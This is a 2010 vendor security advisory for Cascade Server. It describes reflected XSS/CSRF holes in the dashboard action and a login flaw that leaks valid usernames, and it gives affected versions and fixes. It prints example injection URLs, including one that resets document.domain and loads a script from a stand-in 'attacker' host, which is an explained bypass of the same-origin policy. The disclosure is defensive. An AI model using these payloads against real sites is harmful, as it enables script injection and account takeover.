Security Update 05-06-2010

There are two different types of vulnerabilities mentioned in this update: XSS/CSRF and brute-force attack vulnerabilities.

Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) Vulnerabilities in Dashboard, Open, and Browse Actions

Severity: Moderate

Hannon Hill rates the severity of these vulnerabilities as Moderate. The vulnerabilities allow an attacker to make victims execute arbitrary JavaScript, gain access to Cascade, or elevate his/her privileges; but they require the attacker to manipulate victims using social engineering tactics. If the attacker already had Cascade credentials, he/she could embed a malicious link in frequently visited content to more easily manipulate victims into navigating to it.

Risk Assessment

The underlying vulnerability is when an input parameter's value is returned verbatim in the browser in the forwarded page from the following actions: Dashboard, Open, and Browse

XSS Vulnerability

An attacker without access to Cascade could manipulate victims using social engineering tactics to execute arbitrary JavaScript when navigating to the the Cascade dashboard action.
An example link would be:

http://domain:port/home.act?tab=m<script>alert(54682)</script>

An attacker with access to Cascade could embed a link to the Cascade dashboard action containing arbitrary JavaScript in a prominent place within Cascade page content to more easily manipulate victims into navigating to the link.

CSRF Vulnerability

The CSRF vulnerability is an extension of the XSS scripting vulnerability.
Examples include:

http://<cascade_url>/home.act?tab="'><IMG%20SRC="/WF_XSRF.html">

and:

http://<cascade_url>/home.act?tab="'><script>document.domain=domain.dom</script><script%20src="http://subdomain.domain.com/attacker/x.js"/>

NOTE: Both require the attacker to have access to the Cascade server or a server at the same top-level domain where Cascade is running. For example, if Cascade is hosted at cascade.hannonhill.com, the attacker would also need access to be able to access the web space of a sub-domain like intranet.hannonhill.com. In the second example, by resetting the document domain for the page to the top-level domain, this allows the attacker to bypass the Same Origin browser security policy and security restrictions that would normally prevent a script from loading from a different server.

Vulnerability

The XSS and CSRF vulnerabilities exists for all Cascade Server versions prior to Cascade 6.4.5.

Fix

The fix is for Cascade to properly escape and/or hide user input when displaying the error message in the pages forwarded to from the above actions.

Theses have been fixed in Cascade 6.4.5 and later.


Brute force attack vulnerability in Login action

Severity: Moderate

Hannon Hill rates the severity of this vulnerability as moderate as opposed to high as it does not occur for all types of users or for all authentication methods.

Risk Assessment

The vulnerability exists due to the fact that users authenticated using LDAP and users who attempt to authenticate using Web Services are presented with different error messages if their username or password is incorrect.

This opens the system up to a brute-force attack as the attacker would be able to confirm the validity of the guessed username in some cases.

Vulnerability

This vulnerability exists in all versions of Cascade prior to 6.4.5

Fix

The fix is to unify the error messages so that an incorrect username or password will generate the same error regardless of protocol or authentication method.